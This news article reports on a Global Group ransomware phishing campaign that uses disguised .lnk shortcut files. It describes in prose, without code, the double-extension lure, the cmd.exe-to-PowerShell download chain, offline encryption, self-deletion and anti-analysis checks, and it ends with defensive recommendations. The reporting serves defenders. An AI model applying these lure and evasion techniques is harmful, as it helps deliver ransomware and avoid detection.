Global Group ransomware gang running new campaign using Windows shortcut files

When Microsoft patched a vulnerability last summer that allowed threat actors to use Windows’ shortcut (.lnk) files in exploits, defenders might have hoped use of this tactic would decline.

They were wrong.

According to researchers at Forcepoint, a new high-volume phishing campaign spreading the Global Group ransomware has been detected that hopes to sucker employees into clicking on an attachment in an email with the subject line ‘Your document.’

The trigger is a weaponized .lnk file.

“By combining social engineering, stealthy execution, and Living-off-the-Land (LotL) techniques, the file silently retrieves and launches a second stage payload without raising suspicion,” says report author Lydia McElligott, noting that the ‘Your document’ subject line has been heavily used in large scale phishing campaigns throughout 2024 and 2025.

The warning about this campaign follows an IBM detection last month of a similar campaign distributing the Aware ransomware strain, a variant of the Global Group strain used in this attack.

In both cases, the threat actors behind the campaigns were leveraging the Phorpiex botnet, sometimes called Trik by researchers.

Worries about a .lnk vulnerability go back to March 2025, when Trend Micro reported thousands of malicious .lnk files containing hidden command line arguments being used in campaigns dating back to 2017. Mitja Kolsek of 0Patch reported that this particular hole (CVE-2025-9491) was quietly plugged last summer.

However, McElligott doesn’t believe this vulnerability is being used in the latest Global Group campaign, because the target isn’t hidden in the .lnk shortcut file properties.

Who is Global Group?

Global Group is a ransomware as a service (RaaS) operation that emerged in June 2025. Many researchers believe it’s a rebranding of the BlackLock and Mamona operations. Within its first month, it claimed approximately 17 victims across multiple industries and geographic regions. According to researchers at EclecticIQ, as of July 2025, Global Group operated a dedicated leak site on the Tor network. The real IP address of the site went to a Russia-based virtual private server (VPS) provider previously used by Mamona RaaS gang.

McElligott said in an email that, while notable as a newcomer with rapid growth, it wasn’t especially prolific compared to top-tier ransomware operations during the same period.

Why LNK files?

An .lnk file is a Windows Shortcut that serves as a pointer to open a file, folder, or application. It is based on the Shell Link binary file format, which holds information used to access data objects.

Windows shortcut files are still one of the simplest ways to turn a single click into code execution, Forcepoint’s McElligott wrote in her blog. In inboxes, a .lnk can be disguised as a normal document by using double extensions (for example, Document.doc.lnk) and relying on Windows default settings that hide known file extensions. To most users, she wrote, the filename reads like a Word document, not a shortcut that can launch commands.

According to McAfee, when Microsoft disabled Office macros from running by default, threat actors increasingly turned to finding ways to exploit .lnk files, and in a June 2025 report, researchers at Palo Alto Networks also noted that the flexibility of .lnk files “makes them a powerful tool for attackers, as they can both execute malicious content and masquerade as legitimate files to deceive victims into unintentionally launching malware.”

Attackers also lean on familiar visual cues. By borrowing icons from legitimate Windows resources like shell32.dll, the attachment can look like a trusted file type at a glance. That mix of “a document-looking name” plus a recognizable icon reduces user hesitation about clicking, especially useful in high volume phishing where the goal is speed and scale.

Once clicked, McElligott wrote, a shortcut can execute cmd.exe or PowerShell directly, pass arguments quietly, and chain actions without dropping an obvious installer. That low-friction path is why .lnk lures keep showing up in commodity campaigns: they are easy to generate, easy to theme, and they reliably bridge the gap between a phishing email and a payload download.

The phishing messages Forcepoint has seen should easily be deemed suspicious. The message simply reads, “Hello, you can find your document in the attachment. Please reply as soon as possible. Kind regards, GSD Support.” Unlike more sophisticated phishing messages, there isn’t a fake lure (“This is in response to your message”) or pressure for a response (“Urgent,” or “Please look at this and reply by end of day,”).

The attachment in the sample email showed it was named ‘Document.zip’, when in fact it was really named ‘Document.doc.lnk.’ The idea is to hide the .lnk extension. Clicking on the file launches cmd.exe with embedded arguments that invokes PowerShell to download ransomware, write it to disk as a binary masquerading as a legitimate Windows executable, for example windrv.exe, and execute it.

Uncommon tactic

Interestingly, the Global Group ransomware operates in a fully mute mode – that is, instead of communicating through a command and control server, it performs all activity locally on the compromised system. “This tactic is very uncommon,” McElligott said in an email. “Typically, modern ransomware relies on network communication to enable encryption, data exfiltration, double extortion tactics, leak sites, and negotiation infrastructure. Stolen data is used to increase pressure on victims to pay the ransom demands.”

The ransomware doesn’t retrieve an external encryption key; instead, it generates the key on the host machine itself. As a result, despite the claims made in its ransom note, data isn’t exfiltrated.

Exfiltrating data can slow attacks and leave more forensic artifacts, McElligott explained. By focusing on encryption only, ransomware attacks can be deployed faster, hit more victims, and be less likely to be detected. In many cases, she added, data exfiltration isn’t necessary to force payment, as encryption alone can cause significant downtime.

Because Global Group ransomware can operate entirely offline, she said, it is less likely to trigger detection based on network traffic. In fact, the ransomware can execute in air-gapped environments.

“This offline‑only design also increases its likelihood of evading detection in networks where monitoring efforts rely primarily on observing suspicious or anomalous traffic,” said McElligott.

To frustrate detection, the ransomware uses a ping command as a simple timer, giving the malware time to finish executing and terminate cleanly from memory before removing itself from disk to impede forensic analysis. 

The malware also includes anti-virtualization and anti-analysis functionality, enumerating running processes on the host system, and checking for processes associated with virtualized environments used in malware analysis and sandboxing, and for common analysis tools. Additionally, it identifies database-related processes and terminates them to release file locks, thereby increasing the volume of data available for encryption.

Mitigation techniques

Security pros should adopt a layered approach to address the threat of all ransomware attacks, combining prevention, detection, rapid recovery, and user awareness to reduce the likelihood of being victimized, McElligott said.

To blunt an attack by Global Group she recommends that IT:

• impose strong email security to detect the phishing email.
• restrict access to built-in tools like PowerShell, WMI, LolBins, as well as restricting script execution, macros, and unsigned binaries;
• rely on behavioural endpoint detection and remediation (EDR) to detect suspicious process chains;
• segment IT networks to limit lateral movement; 
• enforce least‑privilege access while rotating credentials, and monitoring for anomalous authentication;
• maintain isolated, immutable backups for rapid recovery if files are encrypted.

Security awareness training is key

In addition, security awareness training instructing employees not to click on what should be seen as suspicious attachments is a first line of defense. Too many organizations do security awareness training and phishing tests just to check a compliance box rather than as a key part of a security culture-based approach, warned David Shipley, head of Canadian-based awareness training provider Beauceron Security.

Compliance programs just want to show that an activity has been performed, he told Computerworld. A firm with  a security culture should show that not only has phishing risk been reduced (click rate lowered) and report rate of suspicious activity increased, but also that resiliency has also improved. This is done by measuring how many people clicked a link, and, of that group, how many reported it. It’s known as the post-click report rate (PCRR).

“It’s a fantastic measure of both willingness to admit a mistake and psychological safety,” Shipley said. 

He added that security pros should note that Microsoft’s latest Digital Defense report says AI-powered phishing is 4.5 times more effective than previous phishing efforts, with a 54% click through rate, compared to the previous average click through rate of 12%. 

Research shows the right education, delivered quarterly alongside difficult phishing simulations that reward positive behaviors like reporting suspicious emails, is needed if an organization wants to reduce click rates, Shipley said.